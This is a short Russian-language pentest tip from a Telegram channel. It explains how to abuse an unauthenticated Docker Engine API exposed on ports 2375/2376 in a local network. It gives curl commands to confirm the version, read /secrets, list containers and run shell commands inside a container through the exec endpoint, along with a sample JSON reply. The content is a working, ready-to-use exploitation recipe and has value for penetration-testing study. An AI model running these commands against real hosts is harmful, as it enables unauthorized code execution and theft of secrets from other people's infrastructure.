TGViewer
Pentest Notes Pentest Notes @pentestnotes · 3.1K subscribers
Post #13 192

Forwarded from Двойная кавычка (Bo0oM)

Docker порты 2375, 2376

В локалке иногда можно найти открытый 2375 (http) и 2376 (https). Нашел?
Пробуй curl -s http://10.1.1.1:2375/version, если в ответ пришел json типа:

{"Platform":{"Name":"Docker Engine -
Community"},"Components":[{"Name":"Engine","Version":"20.10.22","Details":{"ApiVersion":"1.41","A
rch":"amd64","BuildTime":"2022-12-
15T22:25:49.000000000+00:00","Experimental":"false","GitCommit":"42c8b31","GoVersion":"go1.18.9
","KernelVersion":"5.15.0-27-
generic","MinAPIVersion":"1.12","Os":"linux"}}

Грац, тебе вернули версию docker engine.

Дальше дергаем секреты, если есть:
/secrets
Контейнеры:
/containers/json

Выполняем в нем код через exec:

curl -X POST -H "Content-Type: application/json" "http://10.1.1.1:2375/containers/ИмяКонтейнера/exec" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "ls"]}'


#docker

>
More from @pentestnotes
  1. Sep 26, 2026Появилось 2 новых RCE в GitLab через regex в CI/CD 🥤 23 сентября GitLab выпустил экстренн…
  2. Sep 12, 2026⚠️ CVE-2026-85706 - GitLab CE/EE Unauthenticated arbitrary file read CVSS 10.0 Критическая…
  3. Sep 6, 2026CVE-2026-19490 - Auth Bypass в Citrix NetScaler ADC / Gateway 🥤 Критическая уязвимость (C…
  4. Aug 27, 2026🚨 Уязвимость в модуле CMS Bitrix - «КОМТЕТ Касса Курьер» Очередная уязвимость под CMS Bit…
  5. Aug 12, 2026Post #237
  6. Aug 9, 2026Как-то незаметно нас стало 3000 😊 Отдельное спасибо тем, кто пишет в директ с вопросами,…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →